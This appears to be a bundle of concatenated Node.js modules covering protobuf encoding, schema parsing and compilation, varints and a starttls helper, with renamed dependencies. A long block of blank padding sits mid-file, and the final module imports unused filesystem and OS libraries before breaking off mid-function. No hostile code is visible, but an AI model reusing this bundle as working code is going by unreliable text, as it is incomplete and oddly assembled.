    decode.bytes = 4
    return val
  }

  return encoder(5, encode, decode, encodingLength)
}()

exports.float = function() {
  var encodingLength = function(val) {
    return 4
  }

  var encode = function(val, buffer, offset) {
    buffer.writeFloatLE(val, offset)
    encode.bytes = 4
    return buffer
  }

  var decode = function(buffer, offset) {
    var val = buffer.readFloatLE(offset)
    decode.bytes = 4
    return val
  }

  return encoder(5, encode, decode, encodingLength)
}()                                                                                                                                       

========

var encodings = require('protobuf_encodings')
var varint = require('varint')
var genobj = require('generate_object_property')
var genfun = require('generate_function')

var skip = function(type, buffer, offset) {
  switch (type) {
    case 0:
    varint.decode(buffer, offset)
    return offset + varint.decode.bytes

    case 1:
    return offset + 8

    case 2:
    var len = varint.decode(buffer, offset)
    return offset + varint.decode.bytes + len

    case 3:
    case 4:
    throw new Error('Groups are not supported')

    case 5:
    return offset + 4
  }

  throw new Error('Unknown wire type: '+type)
}

var defined = function(val) {
  return val !== null && val !== undefined
}

var isString = function(def) {
  try {
    return !!def && typeof JSON.parse(def) === 'string'
  } catch (err) {
    return false
  }
}

var defaultValue = function(f, def) {
  if (f.repeated) return '[]'

  switch (f.type) {
    case 'string':
    return isString(def) ? def : '""'

    case 'bool':
    if (def === 'true') return 'true'
    return 'false'

    case 'float':
    case 'double':
    case 'sfixed32':
    case 'fixed32':
    case 'varint':
    case 'enum':
    case 'uint64':
    case 'uint32':
    case 'int64':
    case 'int32':
    case 'sint64':
    case 'sint32':
    return ''+parseInt(def || 0)

    default:
    return 'null'
  }
}

module.exports = function(schema, extraEncodings) {
  var messages = {}
  var enums = {}
  var cache = {}

  var visit = function(schema, prefix) {
    if (schema.enums) {
      schema.enums.forEach(function(e) {
        e.id = prefix + (prefix ? '.' : '')+e.name
        enums[e.id] = e
        visit(e, e.id)
      })
    }
    if (schema.messages) {
      schema.messages.forEach(function(m) {
        m.id = prefix + (prefix ? '.' : '')+m.name
        messages[m.id] = m
        visit(m, m.id)
      })
    }
  }

  visit(schema, '')

  var compileEnum = function(e) {
    var conditions = Object.keys(e.values)
      .map(function(k) {
        return 'val !== '+parseInt(e.values[k])
      })
      .join(' && ')

    if (!conditions) conditions = 'true'

    var encode = genfun()
      ('function encode(val, buf, offset) {')
        ('if (%s) throw new Error("Invalid enum value: "+val)', conditions)
        ('varint.encode(val, buf, offset)')
        ('encode.bytes = varint.encode.bytes')
        ('return buf')
      ('}')
      .toFunction({
        varint: varint
      })

    var decode = genfun()
      ('function decode(buf, offset) {')
        ('var val = varint.decode(buf, offset)')
        ('if (%s) throw new Error("Invalid enum value: "+val)', conditions)
        ('decode.bytes = varint.decode.bytes')
        ('return val')
      ('}')
      .toFunction({
        varint: varint
      })

    return encodings.make(0, encode, decode, varint.encodingLength)
  }

  var compileMessage = function(m, exports) {
    exports.type = 2
    exports.message = true
    exports.name = m.name

    var enc = m.fields.map(function(f, i) {
      return resolve(f.type, m.id)
    })

    var forEach = function(fn) {
      for (var i = 0; i < enc.length; i++) fn(enc[i], m.fields[i], genobj('obj', m.fields[i].name), i)
    }

    

    var encodingLength = genfun()
      ('function encodingLength(obj) {')
        ('var length = 0')

    forEach(function(e, f, val, i) {
      var packed = f.repeated && f.options && f.options.packed
      var hl = varint.encodingLength(f.tag << 3 | e.type)

      if (f.required) encodingLength('if (!defined(%s)) throw new Error(%s)', val, JSON.stringify(f.name+' is required'))
      else encodingLength('if (defined(%s)) {', val)

      if (packed) {
        encodingLength()
          ('var packedLen = 0')
          ('for (var i = 0; i < %s.length; i++) {', val)
            ('if (!defined(%s)) continue', val+'[i]')
            ('var len = enc[%d].encodingLength(%s)', i, val+'[i]')
            ('packedLen += len')
            if (e.message) encodingLength('packedLen += varint.encodingLength(len)')
          encodingLength('}')
          ('if (packedLen) {')
            ('length += %d + packedLen + varint.encodingLength(packedLen)', hl)
          ('}')
      } else {
        if (f.repeated) {
          encodingLength('for (var i = 0; i < %s.length; i++) {', val)
          val += '[i]'
          encodingLength('if (!defined(%s)) continue', val)
        }

        encodingLength('var len = enc[%d].encodingLength(%s)', i, val)
        if (e.message) encodingLength('length += varint.encodingLength(len)')
        encodingLength('length += %d + len', hl)
        if (f.repeated) encodingLength('}')
      }

      if (!f.required) encodingLength('}')
    })

    encodingLength()
        ('return length')
      ('}')

    encodingLength = encodingLength.toFunction({
      defined: defined,
      varint: varint,
      enc: enc
    })

    

    var encode = genfun()
      ('function encode(obj, buf, offset) {')
        ('if (!offset) offset = 0')
        ('if (!buf) buf = new Buffer(encodingLength(obj))')
        ('var oldOffset = offset')

    forEach(function(e, f, val, i) {
      if (f.required) encode('if (!defined(%s)) throw new Error(%s)', val, JSON.stringify(f.name+' is required'))
      else encode('if (defined(%s)) {', val)

      var packed = f.repeated && f.options && f.options.packed
      var p = varint.encode(f.tag << 3 | 2)
      var h = varint.encode(f.tag << 3 | e.type)

      if (packed) {
        encode()
          ('var packedLen = 0')
          ('for (var i = 0; i < %s.length; i++) {', val)
            ('if (!defined(%s)) continue', val+'[i]')
            ('packedLen += enc[%d].encodingLength(%s)', i, val+'[i]')
          ('}')

        encode('if (packedLen) {')
        for (var j = 0; j < h.length; j++) encode('buf[offset++] = %d', p[j])
        encode('varint.encode(packedLen, buf, offset)')
        encode('offset += varint.encode.bytes')
        encode('}')
      }

      if (f.repeated) {
        encode('for (var i = 0; i < %s.length; i++) {', val)
        val += '[i]'
        encode('if (!defined(%s)) continue', val)
      }

      if (!packed) for (var j = 0; j < h.length; j++) encode('buf[offset++] = %d', h[j])

      if (e.message) {
        encode('varint.encode(enc[%d].encodingLength(%s), buf, offset)', i, val)
        encode('offset += varint.encode.bytes')
      }

      encode('enc[%d].encode(%s, buf, offset)', i, val)
      encode('offset += enc[%d].encode.bytes', i)

      if (f.repeated) encode('}')
      if (!f.required) encode('}')
    })

    encode()
        ('encode.bytes = offset - oldOffset')
        ('return buf')
      ('}')

    encode = encode.toFunction({
      encodingLength: encodingLength,
      defined: defined,
      varint: varint,
      enc: enc,
      Buffer: Buffer
    })

    

    var Message = genfun()

    Message('function Message() {')
    forEach(function(e, f) {
      var def = f.options && f.options.default
      var resolved = resolve(f.type, m.id, false)
      var vals = resolved && resolved.values

      if (vals) { 
        if (f.repeated) {
          Message('%s = []', genobj('this', f.name))
        } else {
          def = (def && def in vals) ? vals[def] : vals[Object.keys(vals)[0]]
          Message('%s = %s', genobj('this', f.name), ''+parseInt(def || 0))
        }
        return
      }

      Message('%s = %s', genobj('this', f.name), defaultValue(f, def))
    })
    Message('}')

    Message = Message.toFunction()

    

    var invalid = m.fields
      .map(function(f, i) {
        return f.required && '!found'+i
      })
      .filter(function(f) {
        return f
      })
      .join(' || ')

    var decode = genfun()

    decode()
      ('function decode(buf, offset, end) {')
        ('if (!offset) offset = 0')
        ('if (!end) end = buf.length')
        ('var oldOffset = offset')
        ('var obj = new Message()')

    forEach(function(e, f, val, i) {
      if (f.required) decode('var found%d = false', i)
    })

    decode('while (true) {')
      ('if (end <= offset) {')
        (invalid && 'if (%s) throw new Error("Decoded message is not valid")', invalid)
        ('decode.bytes = offset - oldOffset')
        ('return obj')
      ('}')
      ('var prefix = varint.decode(buf, offset)')
      ('offset += varint.decode.bytes')
      ('var tag = prefix >> 3')
      ('switch (tag) {')

    forEach(function(e, f, val, i) {
      var packed = f.repeated && f.options && f.options.packed

      decode('case %d:', f.tag)

      if (packed) {
        decode()
          ('var packedEnd = varint.decode(buf, offset)')
          ('offset += varint.decode.bytes')
          ('packedEnd += offset')
          ('while (offset < packedEnd) {')
      }

      if (e.message) {
        decode('var len = varint.decode(buf, offset)')
        decode('offset += varint.decode.bytes')
        if (f.repeated) decode('%s.push(enc[%d].decode(buf, offset, offset + len))', val, i)
        else decode('%s = enc[%d].decode(buf, offset, offset + len)', val, i)
      } else {
        if (f.repeated) decode('%s.push(enc[%d].decode(buf, offset))', val, i)
        else decode('%s = enc[%d].decode(buf, offset)', val, i)
      }

      decode('offset += enc[%d].decode.bytes', i)

      if (packed) decode('}')
      if (f.required) decode('found%d = true', i)
      decode('break')
    })

    decode()
          ('default:')
          ('offset = skip(prefix & 7, buf, offset)')
        ('}')
      ('}')
    ('}')

    decode = decode.toFunction({
      Message: Message,
      varint: varint,
      skip: skip,
      enc: enc
    })

    

    encode.bytes = decode.bytes = 0

    exports.encode = encode
    exports.decode = decode
    exports.encodingLength = encodingLength

    return exports
  }

  var resolve = function(name, from, compile) {
    if (extraEncodings && extraEncodings[name]) return extraEncodings[name]
    if (encodings[name]) return encodings[name]

    var m = (from ? from+'.'+name : name).split('.')
      .map(function(part, i, list) {
        return list.slice(0, i).concat(name).join('.')
      })
      .reverse()
      .reduce(function(result, id) {
        return result || messages[id] || enums[id]
      }, null)

    if (compile === false) return m
    if (!m) throw new Error('Could not resolve '+name)

    if (m.values) return compileEnum(m)
    return cache[m.id] || compileMessage(m, cache[m.id] = {})
  }

  return (schema.enums || []).concat((schema.messages || []).map(function(message) {
    return resolve(message.id)
  }))
}                                                                                                                                  

========

var parse = require('protobuf_schema_parse')
var stringify = require('protobuf_schema_stringify')

module.exports = parse
module.exports.parse = parse
module.exports.stringify = stringify

========

var tokenize = require('protobuf_schema_tokenize')

var onfieldoptions = function(tokens) {
  var opts = {}

  while (tokens.length) {
    switch(tokens[0]) {
      case '[':
      case ',':
      tokens.shift()
      var name = tokens.shift()
      if (tokens[0] !== '=') throw new Error('Unexpected token in field options: '+tokens[0])
      tokens.shift()
      if (tokens[0] === ']') throw new Error('Unexpected ] in field option')
      opts[name] = tokens.shift()
      break

      case ']':
      tokens.shift()
      return opts

      default:
      throw new Error('Unexpected token in field options: '+tokens[0])
    }
  }

  throw new Error('No closing tag for field options')
}

var onfield = function(tokens) {
  var param = []
  var field = {
    name: null,
    type: null,
    tag: 0,
    required: false,
    repeated: false,
    options: {}
  }

  while (tokens.length) {
    switch (tokens[0]) {
      case '=':
      tokens.shift()
      field.tag = parseInt(tokens.shift(), 10)
      break

      case 'repeated':
      case 'required':
      case 'optional':
      var t = tokens.shift()
      field.required = t === 'required'
      field.repeated = t === 'repeated'
      field.type = tokens.shift()
      field.name = tokens.shift()
      break

      case '[':
      field.options = onfieldoptions(tokens)
      break

      case ';':
      tokens.shift()
      return field

      default:
      throw new Error('Unexpected token in message field: '+tokens[0])
    }
  }

  throw new Error('No ; found for message field')
}

var onmessagebody = function(tokens) {
  var body = {
    enums: [],
    messages: [],
    fields: []
  }

  while (tokens.length) {
    switch (tokens[0]) {
      case 'repeated':
      case 'optional':
      case 'required':
      body.fields.push(onfield(tokens))
      break

      case 'enum':
      body.enums.push(onenum(tokens))
      break

      case 'message':
      body.messages.push(onmessage(tokens))
      break

      default:
      throw new Error('Unexpected token in message: '+tokens[0])
    }
  }

  return body
}

var onmessage = function(tokens) {
  tokens.shift()

  var lvl = 1
  var body = []
  var msg = {
    name: tokens.shift(),
    enums: [],
    messages: [],
    fields: []
  }

  if (tokens[0] !== '{') throw new Error('Expected { but found '+tokens[0])
  tokens.shift()

  while (tokens.length) {
    if (tokens[0] === '{') lvl++
    else if (tokens[0] === '}') lvl--

    if (!lvl) {
      tokens.shift()
      var body = onmessagebody(body)
      msg.enums = body.enums
      msg.messages = body.messages
      msg.fields = body.fields
      return msg
    }

    body.push(tokens.shift())
  }

  if (lvl) throw new Error('No closing tag for message')
}

var onpackagename = function(tokens) {
  tokens.shift()
  var name = tokens.shift()
  if (tokens[0] !== ';') throw new Error('Expected ; but found '+tokens[0])
  tokens.shift()
  return name
}

var onenumvalue = function(tokens) {
  if (tokens.length < 4) throw new Error('Invalid enum value: '+tokens.slice(0, 3).join(' '))
  if (tokens[1] !== '=') throw new Error('Expected = but found '+tokens[1])
  if (tokens[3] !== ';') throw new Error('Expected ; but found '+tokens[1])

  var name = tokens.shift()
  tokens.shift()

  var value = parseInt(tokens.shift(), 10)
  tokens.shift()

  return {
    name: name,
    value: value
  }
}

var onenum = function(tokens) {
  tokens.shift()

  var e = {
    name: tokens.shift(),
    values: {}
  }

  if (tokens[0] !== '{') throw new Error('Expected { but found '+tokens[0])
  tokens.shift()

  while (tokens.length) {
    if (tokens[0] === '}') {
      tokens.shift()
      return e
    }
    var val = onenumvalue(tokens)
    e.values[val.name] = val.value
  }

  throw new Error('No closing tag for enum')
}

module.exports = function(buf) {
  var tokens = tokenize(buf.toString())
  var schema = {
    package: null,
    enums: [],
    messages: []
  }

  while (tokens.length) {
    switch (tokens[0]) {
      case 'package':
      schema.package = onpackagename(tokens)
      break

      case 'message':
      schema.messages.push(onmessage(tokens))
      break

      case 'enum':
      schema.enums.push(onenum(tokens))
      break

      default:
      throw new Error('Unexpected token: '+tokens[0])
    }
  }

  return schema
}

========

var onfield = function(f, result) {
  var prefix = f.repeated ? 'repeated' : f.required ? 'required' : 'optional'

  var opts = Object.keys(f.options || {}).map(function(key) {
    return key+' = '+f.options[key]
  }).join(',')

  if (opts) opts = ' ['+opts+']'

  result.push(prefix+' '+f.type+' '+f.name+' = '+f.tag+opts+';')
  return result
}

var onmessage = function(m, result) {
  result.push('message '+m.name+' {')

  if (!m.enums) m.enums = []
  m.enums.forEach(function(e) {
    result.push(onenum(e, []))
  })

  if (!m.messages) m.messages = []
  m.messages.forEach(function(m) {
    result.push(onmessage(m, []))
  })

  if (!m.fields) m.fields = []
  m.fields.forEach(function(f) {
    result.push(onfield(f, []))
  })

  result.push('}', '')
  return result
}

var onenum = function(e, result) {
  result.push('enum '+e.name+' {')

  var vals = Object.keys(e.values).map(function(key) {
    return key+' = '+e.values[key]+';'
  })

  result.push(vals)
  result.push('}', '')
  return result
}

var indent = function(lvl) {
  return function(line) {
    if (Array.isArray(line)) return line.map(indent(lvl+'  ')).join('\n')
    return lvl+line
  }
}

module.exports = function(schema) {
  var result = []
  if (schema.package) result.push('package '+schema.package+';', '')

  if (!schema.enums) schema.enums = []
  schema.enums.forEach(function(e) {
    onenum(e, result)
  })

  if (!schema.messages) schema.messages = []
  schema.messages.forEach(function(m) {
    onmessage(m, result)
  })

  return result.map(indent('')).join('\n')
}

========

module.exports = function(sch) {
  var noComments = function(line) {
    var i = line.indexOf('//')
    return i > -1 ? line.slice(0, i) : line
  }

  var noMultilineComments = function() {
    var inside = false
    return function(token) {
      if (token === '/*') {
        inside = true
        return false
      }
      if (token === '*/') {
        inside = false
        return false
      }
      return !inside
    }
  }

  var trim = function(line) {
    return line.trim()
  }

  return sch
    .replace(/([;,{}=\[\]]|\/\*|\*\/)/g, ' $1 ')
    .split(/\n/)
    .map(trim)
    .filter(trim)
    .map(noComments)
    .filter(trim)
    .join('\n')
    .split(/\s+|\n+/gm)
    .filter(noMultilineComments())
}

========

var schema = require('protobuf_schema')
var compile = require('protobuf_compile')


module.exports = function(proto, opts) {
  if (!opts) opts = {}
  if (!proto) throw new Error('Pass in a .proto string or a protobuf-schema parsed object')

  var sch = (typeof proto === 'object' && !Buffer.isBuffer(proto)) ? proto : schema.parse(proto)

  
  var Messages = function() {
    var self = this

    compile(sch, opts.encodings || {}).forEach(function(m) {
      self[m.name] = m.values || m
    })
  }

  Messages.prototype.toString = function() {
    return schema.stringify(sch)
  }

  Messages.prototype.toJSON = function() {
    return sch
  }

  return new Messages()
}                                                                             

========

var varint = require('varint')
exports.encode = function encode (v, b, o) {
  v = v >= 0 ? v*2 : v*-2 - 1
  var r = varint.encode(v, b, o)
  encode.bytes = varint.encode.bytes
  return r
}
exports.decode = function decode (b, o) {
  var v = varint.decode(b, o)
  decode.bytes = varint.decode.bytes
  return v & 1 ? (v+1) / -2 : v / 2
}

exports.encodingLength = function (v) {
  return varint.encodingLength(v >= 0 ? v*2 : v*-2 - 1)
}


========

var MSB = 0x80
  , REST = 0x7F
  , MSBALL = ~REST
  , INT = Math.pow(2, 31)

function read(buf, offset) {
  var res    = 0
    , offset = offset || 0
    , shift  = 0
    , counter = offset
    , b
    , l = buf.length
  
  do {
    if(counter >= l) {
      read.bytesRead = 0
      return undefined
    }
    b = buf[counter++]
    res += shift < 28
      ? (b & REST) << shift
      : (b & REST) * Math.pow(2, shift)
    shift += 7
  } while (b >= MSB)
  
  read.bytes = counter - offset
  
  return res
}

function encode(num, out, offset) {
  out = out || []
  offset = offset || 0
  var oldOffset = offset

  while(num >= INT) {
    out[offset++] = (num & 0xFF) | MSB
    num /= 128
  }
  while(num & MSBALL) {
    out[offset++] = (num & 0xFF) | MSB
    num >>>= 7
  }
  out[offset] = num | 0
  
  encode.bytes = offset - oldOffset + 1
  
  return out
} 

var N1 = Math.pow(2,  7)
var N2 = Math.pow(2, 14)
var N3 = Math.pow(2, 21)
var N4 = Math.pow(2, 28)
var N5 = Math.pow(2, 35)
var N6 = Math.pow(2, 42)
var N7 = Math.pow(2, 49)

function encodingLength(value) {
  return (
    value < N1 ? 1
  : value < N2 ? 2
  : value < N3 ? 3
  : value < N4 ? 4
  : value < N5 ? 5
  : value < N6 ? 6
  : value < N7 ? 7
  :              8
  )
}  

module.exports = {
    encode: encode
  , decode: read
  , encodingLength: encodingLength
}



========




















































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































  



















                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  

========



'use strict';




var net = require('net');
var tls = require('tls');
var crypto = require('crypto');

module.exports = exports = function (options, onSecure) {
    var socket, credentials, securePair;

    if (options instanceof net.Socket) {
        socket = options;
        options = {
            socket: socket
        };
    } else if (options.socket) {
        socket = options.socket;
    } else {
        socket = options.socket = net.createConnection(options);
    }

    if (options.pair) {
        securePair = options.pair;
    } else {

        
        if (tls.createSecureContext) {
            credentials = tls.createSecureContext();
        } else {
            credentials = crypto.createCredentials();
        }

        securePair = tls.createSecurePair(credentials, false);
        options.pair = securePair;
    }

    
    if (socket.readable || undefined === socket.readable) {
        return startTls(options, onSecure);
    }

    
    socket.once('connect', function () {
        startTls(options, onSecure);
    });

    return securePair;
};

function startTls(options, onSecure) {
    var socket, host, securePair, clearText;

    socket = options.socket;
    host = options.host;
    securePair = options.pair;

    socket.ondata = null;
    socket.removeAllListeners('data');

    clearText = pipe(securePair, socket);

    securePair.once('secure', function () {
        var err;

        
        err = securePair.ssl.verifyError();
        if (err) {
            clearText.authorized = false;
            clearText.authorizationError = err;
        } else {
            clearText.authorized = true;
        }

        
        if (!onSecure) {
            return;
        }

        if (host) {
            err = tls.checkServerIdentity(host, clearText.getPeerCertificate());

            
            
            if (false === err) {
                err = new Error('Server identity mismatch: invalid certificate for ' + host + '.');
            } else if (true === err) {
                err = null;
            }
        }

        onSecure.call(securePair, err);
    });

    clearText._controlReleased = true;

    return securePair;
}

function forwardEvents(events, emitterSource, emitterDestination) {
    var i, l, event, handler, forwardEvent;

    forwardEvent = function () {
        this.emit.apply(this, arguments);
    };

    for (i = 0, l = events.length; i < l; i++) {
        event = events[i];
        handler = forwardEvent.bind(emitterDestination, event);

        emitterSource.on(event, handler);
    }
}

function removeEvents(events, emitterSource) {
    var i, l;

    for (i = 0, l = events.length; i < l; i++) {
        emitterSource.removeAllListeners(events[i]);
    }
}

function pipe(securePair, socket) {
    var clearText, onError, onClose, events;

    events = ['timeout', 'end', 'drain'];
    clearText = securePair.cleartext;

    onError = function (err) {
        if (clearText._controlReleased) {
            clearText.emit('error', err);
        }
    };

    onClose = function () {
        socket.removeListener('error', onError);
        socket.removeListener('close', onClose);
        removeEvents(events, socket);
    };

    
    forwardEvents(events, socket, clearText);
    socket.on('error', onError);
    socket.on('close', onClose);

    securePair.on('error', function (err) {
        onError(err);
    });

    securePair.encrypted.pipe(socket);
    socket.pipe(securePair.encrypted);

    securePair.fd = socket.fd;

    clearText.socket = socket;
    clearText.encrypted = securePair.encrypted;
    clearText.authorized = false;

    return clearText;
}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              

========

var util = require('util');
var Readable = require('stream').Readable;
var Writable = require('stream').Writable;
var PassThrough = require('stream').PassThrough;

var fs = require('fs');
var path = require('path');
var os = require('os');
var zlib = require('zlib');

function wrappy (fn, cb) {
  if (fn && cb) return wrappy(fn)(cb)

  if (typeof fn !== 'function')
    throw new TypeError('need wrapper function')

  Object.keys(fn).forEach(function (k) {
    wrapper[k] = fn[k]
  })

  return wrapper

  function wrapper() {
    var args = new Array(arguments.length)
    for (var i = 0; i < args.length; i++) {
      args[i] = arguments[i]
    }
    var ret = fn.apply(this, args)
    var cb = args[args.length-1]
    if (typeof ret === 'function' && ret !== cb) {
      Object.keys(cb).forEach(function (k) {
